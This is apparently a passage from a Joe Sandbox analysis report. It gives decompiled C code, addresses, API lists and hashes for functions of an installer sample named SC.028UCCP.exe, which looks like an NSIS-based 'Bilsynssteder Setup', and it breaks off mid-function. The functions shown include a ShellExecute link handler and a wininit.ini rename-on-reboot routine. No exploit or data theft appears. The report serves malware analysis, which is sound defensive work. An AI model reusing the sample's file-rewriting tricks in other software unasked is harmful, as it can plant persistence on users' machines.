                                  Download Yara Rule
                                  C-Code - Quality: 94%
                                  			E00403FF1(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				char* _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				intOrPtr _t71;
				intOrPtr _t85;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				signed int _t106;
				intOrPtr _t107;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					__eflags = _a8 - 0x111;
					if(_a8 != 0x111) {
						L11:
						__eflags = _a8 - 0x4e;
						if(_a8 != 0x4e) {
							__eflags = _a8 - 0x40b;
							if(_a8 == 0x40b) {
								 *0x428fec =  *0x428fec + 1;
								__eflags =  *0x428fec;
							}
							L25:
							_t110 = _a16;
							L26:
							return E00403F0F(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						__eflags =  *((intOrPtr*)(_t110 + 8)) - 0x70b;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b) {
							__eflags =  *((intOrPtr*)(_t110 + 0xc)) - 0x201;
							if( *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
								_t100 =  *((intOrPtr*)(_t110 + 0x1c));
								_t109 =  *((intOrPtr*)(_t110 + 0x18));
								_v12 = _t100;
								__eflags = _t100 - _t109 - 0x800;
								_v16 = _t109;
								_v8 = 0x42db40;
								if(_t100 - _t109 < 0x800) {
									SendMessageA(_t52, 0x44b, 0,  &_v16);
									SetCursor(LoadCursorA(0, 0x7f02));
									ShellExecuteA(_a4, "open", _v8, 0, 0, 1);
									SetCursor(LoadCursorA(0, 0x7f00));
									_t110 = _a16;
								}
							}
						}
						__eflags =  *((intOrPtr*)(_t110 + 8)) - 0x700;
						if( *((intOrPtr*)(_t110 + 8)) != 0x700) {
							goto L26;
						} else {
							__eflags =  *((intOrPtr*)(_t110 + 0xc)) - 0x100;
							if( *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
								goto L26;
							}
							__eflags =  *((intOrPtr*)(_t110 + 0x10)) - 0xd;
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x42eba8, 0x111, 1, 0);
							}
							__eflags =  *((intOrPtr*)(_t110 + 0x10)) - 0x1b;
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x42eba8, 0x10, 0, 0);
							}
							return 1;
						}
					}
					__eflags = _a12 >> 0x10;
					if(_a12 >> 0x10 != 0) {
						goto L25;
					}
					__eflags =  *0x428fec; // 0x0
					if(__eflags != 0) {
						goto L25;
					}
					_t112 =  *0x4297f8 + 0x14;
					__eflags =  *_t112 & 0x00000020;
					if(( *_t112 & 0x00000020) == 0) {
						goto L25;
					}
					_t106 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
					__eflags = _t106;
					 *_t112 = _t106;
					E00403ECA(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
					E0040427B();
					goto L11;
				} else {
					_t98 = _a16;
					_t113 =  *(_t98 + 0x30);
					if(_t113 < 0) {
						_t107 =  *0x42e37c; // 0x5ac8c7
						_t113 =  *(_t107 - 4 + _t113 * 4);
					}
					_t71 =  *0x42ebd8; // 0x5aba28
					_push( *((intOrPtr*)(_t98 + 0x34)));
					_t114 = _t113 + _t71;
					_push(0x22);
					_a16 =  *_t114;
					_v12 = _v12 & 0x00000000;
					_t115 = _t114 + 1;
					_v16 = _t115;
					_v8 = E00403FBC;
					E00403EA8(_a4);
					_push( *((intOrPtr*)(_t98 + 0x38)));
					_push(0x23);
					E00403EA8(_a4);
					CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
					E00403ECA( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
					_t99 = GetDlgItem(_a4, 0x3e8);
					E00403EDD(_t99);
					SendMessageA(_t99, 0x45b, 1, 0);
					_t85 =  *0x42ebb0; // 0x5aa248
					_t86 =  *(_t85 + 0x68);
					if(_t86 < 0) {
						_t86 = GetSysColor( ~_t86);
					}
					SendMessageA(_t99, 0x443, 0, _t86);
					SendMessageA(_t99, 0x445, 0, 0x4010000);
					SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
					 *0x428fec = 0;
					SendMessageA(_t99, 0x449, _a16,  &_v16);
					 *0x428fec = 0;
					return 0;
				}
			}





















                                  0x00404001
                                  0x00404113
                                  0x00404126
                                  0x00404182
                                  0x00404182
                                  0x00404186
                                  0x00404256
                                  0x0040425d
                                  0x0040425f
                                  0x0040425f
                                  0x0040425f
                                  0x00404265
                                  0x00404265
                                  0x00404268
                                  0x00000000
                                  0x0040426f
                                  0x00404194
                                  0x00404196
                                  0x00404199
                                  0x004041a0
                                  0x004041a2
                                  0x004041a9
                                  0x004041ab
                                  0x004041ae
                                  0x004041b1
                                  0x004041b6
                                  0x004041bc
                                  0x004041bf
                                  0x004041c6
                                  0x004041d4
                                  0x004041ec
                                  0x004041ff
                                  0x0040420f
                                  0x00404211
                                  0x00404211
                                  0x004041c6
                                  0x004041a9
                                  0x00404214
                                  0x0040421b
                                  0x00000000
                                  0x0040421d
                                  0x0040421d
                                  0x00404224
                                  0x00000000
                                  0x00000000
                                  0x00404226
                                  0x0040422a
                                  0x0040423b
                                  0x0040423b
                                  0x0040423d
                                  0x00404241
                                  0x0040424f
                                  0x0040424f
                                  0x00000000
                                  0x00404253
                                  0x0040421b
                                  0x0040412e
                                  0x00404131
                                  0x00000000
                                  0x00000000
                                  0x00404139
                                  0x0040413f
                                  0x00000000
                                  0x00000000
                                  0x0040414b
                                  0x0040414e
                                  0x00404151
                                  0x00000000
                                  0x00000000
                                  0x00404174
                                  0x00404174
                                  0x00404176
                                  0x00404178
                                  0x0040417d
                                  0x00000000
                                  0x00404007
                                  0x00404007
                                  0x0040400a
                                  0x0040400f
                                  0x00404011
                                  0x00404020
                                  0x00404020
                                  0x00404022
                                  0x00404027
                                  0x0040402a
                                  0x0040402c
                                  0x00404031
                                  0x0040403a
                                  0x00404040
                                  0x0040404c
                                  0x0040404f
                                  0x00404058
                                  0x0040405d
                                  0x00404060
                                  0x00404065
                                  0x0040407c
                                  0x00404083
                                  0x00404096
                                  0x00404099
                                  0x004040ae
                                  0x004040b0
                                  0x004040b5
                                  0x004040ba
                                  0x004040bf
                                  0x004040bf
                                  0x004040ce
                                  0x004040dd
                                  0x004040ef
                                  0x004040f4
                                  0x00404104
                                  0x00404106
                                  0x00000000
                                  0x0040410c

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                  • String ID: Call$N$open
                                  • API String ID: 3615053054-2563687911
                                  • Opcode ID: 51a361e6dc41c16568c55e04c1d01dbf2954b7e404280b64648fd5416c1df2c8
                                  • Instruction ID: cd5527be7b01cdd750bd7826aa0acaeb768eecc7c59dcf5154f0932c76b133a4
                                  • Opcode Fuzzy Hash: 51a361e6dc41c16568c55e04c1d01dbf2954b7e404280b64648fd5416c1df2c8
                                  • Instruction Fuzzy Hash: A961AFB1A40209BFEF109F61CC45F6A7B69FB84741F10417AFB05BA2D1C7B8A951CB98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004058BE Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 141filestringmemoryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E004058BE() {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				long _t16;
				intOrPtr _t18;
				long _t29;
				char* _t37;
				int _t43;
				void* _t44;
				intOrPtr* _t45;
				long _t48;
				CHAR* _t50;
				void* _t52;
				void* _t54;
				void* _t55;
				void* _t58;
				void* _t59;

				lstrcpyA(0x42bdb0, "NUL");
				_t50 =  *(_t58 + 0x1c);
				if(_t50 == 0) {
					L3:
					_t16 = GetShortPathNameA( *(_t58 + 0x20), 0x42c1b0, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						_t43 = wsprintfA(0x42b9b0, "%s=%s\r\n", 0x42bdb0, 0x42c1b0);
						_t18 =  *0x42ebb0; // 0x5aa248
						_t59 = _t58 + 0x10;
						E00405BBA(_t43, 0x42bdb0, 0x42c1b0, 0x42c1b0,  *((intOrPtr*)(_t18 + 0x128)));
						_t16 = E00405846(0x42c1b0, 0xc0000000, 4);
						_t54 = _t16;
						 *(_t59 + 0x1c) = _t54;
						if(_t54 != 0xffffffff) {
							_t48 = GetFileSize(_t54, 0);
							_t6 = _t43 + 0xa; // 0xa
							_t52 = GlobalAlloc(0x40, _t48 + _t6);
							if(_t52 == 0 || ReadFile(_t54, _t52, _t48, _t59 + 0x10, 0) == 0 || _t48 !=  *(_t59 + 0x10)) {
								L19:
								return CloseHandle(_t54);
							} else {
								if(E004057AB(_t44, _t52, "[Rename]\r\n") != 0) {
									_t55 = E004057AB(_t44, _t26 + 0xa, 0x40936c);
									if(_t55 == 0) {
										_t54 =  *(_t59 + 0x1c);
										L17:
										_t29 = _t48;
										L18:
										E00405801(_t52 + _t29, 0x42b9b0, _t43);
										SetFilePointer(_t54, 0, 0, 0);
										WriteFile(_t54, _t52, _t48 + _t43, _t59 + 0x10, 0);
										GlobalFree(_t52);
										goto L19;
									}
									_t45 = _t52 + _t48;
									_t37 = _t45 + _t43;
									while(_t45 > _t55) {
										 *_t37 =  *_t45;
										_t37 = _t37 - 1;
										_t45 = _t45 - 1;
									}
									_t29 = _t55 - _t52 + 1;
									_t54 =  *(_t59 + 0x1c);
									goto L18;
								}
								lstrcpyA(_t52 + _t48, "[Rename]\r\n");
								_t48 = _t48 + 0xa;
								goto L17;
							}
						}
					}
				} else {
					CloseHandle(E00405846(_t50, 0, 1));
					_t16 = GetShortPathNameA(_t50, 0x42bdb0, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						goto L3;
					}
				}
				return _t16;
			}





















                                  0x004058ce
                                  0x004058d4
                                  0x004058e5
                                  0x0040590d
                                  0x00405918
                                  0x0040591c
                                  0x0040593c
                                  0x0040593e
                                  0x00405943
                                  0x0040594d
                                  0x0040595a
                                  0x0040595f
                                  0x00405964
                                  0x00405968
                                  0x00405977
                                  0x00405979
                                  0x00405986
                                  0x0040598a
                                  0x00405a3f
                                  0x00000000
                                  0x004059b2
                                  0x004059bf
                                  0x004059e3
                                  0x004059e7
                                  0x00405a06
                                  0x00405a0a
                                  0x00405a0a
                                  0x00405a0c
                                  0x00405a15
                                  0x00405a20
                                  0x00405a32
                                  0x00405a39
                                  0x00000000
                                  0x00405a39
                                  0x004059e9
                                  0x004059ec
                                  0x004059f7
                                  0x004059f3
                                  0x004059f5
                                  0x004059f6
                                  0x004059f6
                                  0x004059fe
                                  0x00405a00
                                  0x00000000
                                  0x00405a00
                                  0x004059ca
                                  0x004059d0
                                  0x00000000
                                  0x004059d0
                                  0x0040598a
                                  0x00405968
                                  0x004058e7
                                  0x004058f2
                                  0x004058fb
                                  0x004058ff
                                  0x00000000
                                  0x00000000
                                  0x004058ff
                                  0x00405a4b

                                  APIs
                                  • lstrcpyA.KERNEL32(0042BDB0,NUL,?,00000000,?,00000000,?,00405A74,?,?,00000001,00405634,?,00000000,000000F1,?), ref: 004058CE
                                  • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,00000000,?,00405A74,?,?,00000001,00405634,?,00000000,000000F1,?), ref: 004058F2
                                  • GetShortPathNameA.KERNEL32 ref: 004058FB
                                    • Part of subcall function 004057AB: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,004059BD,00000000,[Rename]), ref: 004057BB
                                    • Part of subcall function 004057AB: lstrlenA.KERNEL32(?,?,00000000,004059BD,00000000,[Rename]), ref: 004057ED
                                  • GetShortPathNameA.KERNEL32 ref: 00405918
                                  • wsprintfA.USER32 ref: 00405936
                                  • GetFileSize.KERNEL32(00000000,00000000,0042C1B0,C0000000,00000004,0042C1B0,?,?,?,?,?), ref: 00405971
                                  • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405980
                                  • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0040599A
                                  • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 004059CA
                                  • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,0042B9B0,00000000,-0000000A,0040936C,00000000,[Rename]), ref: 00405A20
                                  • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00405A32
                                  • GlobalFree.KERNEL32 ref: 00405A39
                                  • CloseHandle.KERNEL32(00000000), ref: 00405A40
                                    • Part of subcall function 00405846: GetFileAttributesA.KERNELBASE(00000003,00402C73,C:\Users\user\Desktop\SC.028UCCP.exe,80000000,00000003), ref: 0040584A
                                    • Part of subcall function 00405846: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040586C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                  • String ID: %s=%s$NUL$[Rename]
                                  • API String ID: 3756836283-4148678300
                                  • Opcode ID: 0e8e631bf26e18e4e01423c26e0453d2a1c56ec703afa11c132e8a2a2869d5ab
                                  • Instruction ID: 071f1bedc6bad253eda7905f96c0224db6c740fdd14e9da81140b4a3fca74d15
                                  • Opcode Fuzzy Hash: 0e8e631bf26e18e4e01423c26e0453d2a1c56ec703afa11c132e8a2a2869d5ab
                                  • Instruction Fuzzy Hash: 0841D471B04755AFD2206B619C89F6B7A5CEB85754F14053AFD01F72C2E678A8008EBD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00401000 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 90%
                                  			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				intOrPtr _t115;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x42ebb0; // 0x5aa248
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, "Bilsynssteder Setup", 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					_t115 =  *0x42eba8; // 0x40218
					 *((intOrPtr*)(_t102 + 4)) = _t115;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}














                                  0x0040100a
                                  0x00401039
                                  0x00401047
                                  0x0040104d
                                  0x00401051
                                  0x0040105b
                                  0x00401061
                                  0x00401064
                                  0x004010f3
                                  0x00401089
                                  0x0040108c
                                  0x004010a6
                                  0x004010bd
                                  0x004010cc
                                  0x004010cf
                                  0x004010d5
                                  0x004010d9
                                  0x004010e4
                                  0x004010ed
                                  0x004010ef
                                  0x004010ef
                                  0x00401100
                                  0x00401105
                                  0x0040110d
                                  0x00401110
                                  0x00401112
                                  0x00401118
                                  0x0040111f
                                  0x00401126
                                  0x00401130
                                  0x00401142
                                  0x00401156
                                  0x00401160
                                  0x00401165
                                  0x00401165
                                  0x00401110
                                  0x0040116e
                                  0x00000000
                                  0x00401178
                                  0x00401010
                                  0x00401013
                                  0x00401015
                                  0x00401019
                                  0x0040101f
                                  0x0040101f
                                  0x00000000

                                  APIs
                                  • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                  • BeginPaint.USER32(?,?), ref: 00401047
                                  • GetClientRect.USER32 ref: 0040105B
                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                  • FillRect.USER32 ref: 004010E4
                                  • DeleteObject.GDI32(?), ref: 004010ED
                                  • CreateFontIndirectA.GDI32(?), ref: 00401105
                                  • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                  • SetTextColor.GDI32(00000000,?), ref: 00401130
                                  • SelectObject.GDI32(00000000,?), ref: 00401140
                                  • DrawTextA.USER32(00000000,Bilsynssteder Setup,000000FF,00000010,00000820), ref: 00401156
                                  • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                  • DeleteObject.GDI32(?), ref: 00401165
                                  • EndPaint.USER32(?,?), ref: 0040116E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                  • String ID: Bilsynssteder Setup$F
                                  • API String ID: 941294808-2844915942
                                  • Opcode ID: ba4e0aeaea3a811c503903e6f7a1a9974574a5d0e3280e24df55959760edf428
                                  • Instruction ID: d739c411fb0a3510c8e8b782188d1d9e67e91bc4641c8cbf6c57472f1a226fbe
                                  • Opcode Fuzzy Hash: ba4e0aeaea3a811c503903e6f7a1a9974574a5d0e3280e24df55959760edf428
                                  • Instruction Fuzzy Hash: FA418A71804249AFCB05CF95DD459BFBFB9FF44310F00812AF962AA1A0C738AA51DFA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1000236D Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 132memoryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 89%
                                  			E1000236D(void* __edx) {
				intOrPtr _t19;
				intOrPtr _t22;
				void* _t24;
				short* _t25;
				void* _t26;
				void* _t31;
				void* _t33;
				void* _t35;
				void* _t37;
				void* _t41;
				void* _t44;
				int _t49;
				void* _t50;
				void* _t56;
				intOrPtr _t57;
				short** _t60;
				short** _t61;
				void* _t62;
				void* _t63;

				_t56 = __edx;
				_t19 =  *((intOrPtr*)(_t63 + 8));
				_t57 =  *((intOrPtr*)(_t19 + 0x814));
				 *((intOrPtr*)(_t63 + 0x10)) = _t57;
				_t60 = (_t57 + 0x41 << 5) + _t19;
				do {
					if( *((intOrPtr*)(_t60 - 4)) != 0xffffffff) {
						_t61 = _t60;
					} else {
						_t61 =  *_t60;
					}
					_t62 = E10001215();
					_t49 = 0;
					_t22 =  *((intOrPtr*)(_t60 - 8));
					if(_t22 == 0) {
						lstrcpyA(_t62, 0x10004034);
					} else {
						_t31 = _t22 - 1;
						if(_t31 == 0) {
							_push( *_t61);
							goto L12;
						} else {
							_t33 = _t31 - 1;
							if(_t33 == 0) {
								E10001446(_t56,  *_t61, _t61[1], _t62);
								goto L13;
							} else {
								_t35 = _t33 - 1;
								if(_t35 == 0) {
									lstrcpynA(_t62,  *_t61,  *0x1000405c);
								} else {
									_t37 = _t35 - 1;
									if(_t37 == 0) {
										WideCharToMultiByte(0, 0,  *_t61,  *0x1000405c, _t62,  *0x1000405c - 1, 0, 0);
										 *( *0x1000405c + _t62 - 1) =  *( *0x1000405c + _t62 - 1) & 0x00000000;
									} else {
										_t41 = _t37 - 1;
										if(_t41 == 0) {
											_t44 = GlobalAlloc(0x40,  *0x1000405c +  *0x1000405c);
											_push( *0x1000405c);
											_t50 = _t44;
											_push(_t50);
											_push( *_t61);
											" {xv@uxv"();
											WideCharToMultiByte(0, 0, _t50,  *0x1000405c, _t62,  *0x1000405c, 0, 0);
											GlobalFree(_t50);
											_t49 = 0;
										} else {
											if(_t41 == 1) {
												_push( *_t60);
												L12:
												wsprintfA(_t62, 0x10004000);
												L13:
												_t63 = _t63 + 0xc;
											}
										}
									}
								}
							}
						}
					}
					_t24 = _t60[5];
					if(_t24 != _t49 && ( *((intOrPtr*)( *((intOrPtr*)(_t63 + 0x18)))) != 2 ||  *((intOrPtr*)(_t60 - 4)) > _t49)) {
						GlobalFree(_t24);
					}
					_t25 = _t60[4];
					if(_t25 != _t49) {
						if(_t25 != 0xffffffff) {
							if(_t25 > _t49) {
								E100012E8(_t25 - 1, _t62);
								goto L29;
							}
						} else {
							E10001278(_t62);
							L29:
						}
					}
					_t26 = GlobalFree(_t62);
					 *((intOrPtr*)(_t63 + 0x10)) =  *((intOrPtr*)(_t63 + 0x10)) - 1;
					_t60 = _t60 - 0x20;
				} while ( *((intOrPtr*)(_t63 + 0x10)) >= _t49);
				return _t26;
			}






















                                  0x1000236d
                                  0x1000236e
                                  0x10002376
                                  0x1000237c
                                  0x10002386
                                  0x10002388
                                  0x1000238c
                                  0x10002392
                                  0x1000238e
                                  0x1000238e
                                  0x1000238e
                                  0x10002399
                                  0x1000239e
                                  0x100023a0
                                  0x100023a2
                                  0x10002472
                                  0x100023a8
                                  0x100023a8
                                  0x100023a9
                                  0x10002465
                                  0x00000000
                                  0x100023af
                                  0x100023af
                                  0x100023b0
                                  0x1000245b
                                  0x00000000
                                  0x100023b6
                                  0x100023b6
                                  0x100023b7
                                  0x1000244d
                                  0x100023bd
                                  0x100023bd
                                  0x100023be
                                  0x10002432
                                  0x1000243d
                                  0x100023c0
                                  0x100023c0
                                  0x100023c1
                                  0x100023ea
                                  0x100023f0
                                  0x100023f6
                                  0x100023f8
                                  0x100023f9
                                  0x100023fb
                                  0x10002410
                                  0x10002417
                                  0x1000241d
                                  0x100023c3
                                  0x100023c4
                                  0x100023ca
                                  0x100023cc
                                  0x100023d2
                                  0x100023d8
                                  0x100023d8
                                  0x100023d8
                                  0x100023c4
                                  0x100023c1
                                  0x100023be
                                  0x100023b7
                                  0x100023b0
                                  0x100023a9
                                  0x10002478
                                  0x1000247d
                                  0x1000248e
                                  0x1000248e
                                  0x10002494
                                  0x10002499
                                  0x1000249e
                                  0x100024aa
                                  0x100024af
                                  0x00000000
                                  0x100024b4
                                  0x100024a0
                                  0x100024a1
                                  0x100024b5
                                  0x100024b5
                                  0x1000249e
                                  0x100024b7
                                  0x100024bd
                                  0x100024c1
                                  0x100024c4
                                  0x100024d3

                                  APIs
                                  • wsprintfA.USER32 ref: 100023D2
                                  • GlobalAlloc.KERNEL32(00000040,?,?,?,?,00000000,00000001,100017D5,00000000), ref: 100023EA
                                  • StringFromGUID2.OLE32(?,00000000,?,?,?,00000000,00000001,100017D5,00000000), ref: 100023FB
                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000000,00000001,100017D5,00000000), ref: 10002410
                                  • GlobalFree.KERNEL32 ref: 10002417
                                    • Part of subcall function 100012E8: lstrcpyA.KERNEL32(-1000404B,00000000,?,10001199,?,00000000), ref: 10001310
                                  • GlobalFree.KERNEL32 ref: 1000248E
                                  • GlobalFree.KERNEL32 ref: 100024B7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.798233791.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                  • Associated: 00000000.00000002.798214888.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000000.00000002.798250041.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000000.00000002.798280096.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_10000000_SC.jbxd
                                  Similarity
                                  • API ID: Global$Free$AllocByteCharFromMultiStringWidelstrcpywsprintf
                                  • String ID: {xv@uxv
                                  • API String ID: 2278267121-1953920604
                                  • Opcode ID: 3ee0894ed4fe1b0af880131e50e06ec5e86c9efe6cc015858b811f9b411bf8ba
                                  • Instruction ID: 2b73d6ec50a8d2f500b210c633f34be0aa2160400c3477ecc395e3c682f4b703
                                  • Opcode Fuzzy Hash: 3ee0894ed4fe1b0af880131e50e06ec5e86c9efe6cc015858b811f9b411bf8ba
                                  • Instruction Fuzzy Hash: DE41ADB1109216EFF715DFA4CC88E2BBBECFB042D57124619FA51921A9DB35AC409B31
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 100021AF Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 136memorystringCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 91%
                                  			E100021AF(void* __edx, intOrPtr _a4) {
				signed int _v4;
				CHAR* _t32;
				intOrPtr _t33;
				void* _t34;
				void* _t36;
				void* _t43;
				void** _t49;
				CHAR* _t58;
				void* _t59;
				signed int* _t60;
				void* _t61;
				intOrPtr* _t62;
				CHAR* _t63;
				void* _t73;

				_t59 = __edx;
				_v4 = 0 |  *((intOrPtr*)(_a4 + 0x814)) > 0x00000000;
				while(1) {
					_t9 = _a4 + 0x818; // 0x818
					_t62 = (_v4 << 5) + _t9;
					_t32 =  *(_t62 + 0x14);
					if(_t32 == 0) {
						goto L9;
					}
					_t58 = 0x1a;
					if(_t32 == _t58) {
						goto L9;
					}
					if(_t32 != 0xffffffff) {
						if(_t32 <= 0 || _t32 > 0x19) {
							 *(_t62 + 0x14) = _t58;
						} else {
							_t32 = E100012BF(_t32 - 1);
							L10:
						}
						goto L11;
					} else {
						_t32 = E1000123B();
						L11:
						_t63 = _t32;
						_t13 = _t62 + 8; // 0x820
						_t60 = _t13;
						if( *((intOrPtr*)(_t62 + 4)) != 0xffffffff) {
							_t49 = _t60;
						} else {
							_t49 =  *_t60;
						}
						_t33 =  *_t62;
						 *(_t62 + 0x1c) =  *(_t62 + 0x1c) & 0x00000000;
						if(_t33 == 0) {
							 *_t60 =  *_t60 & 0x00000000;
						} else {
							if(_t33 == 1) {
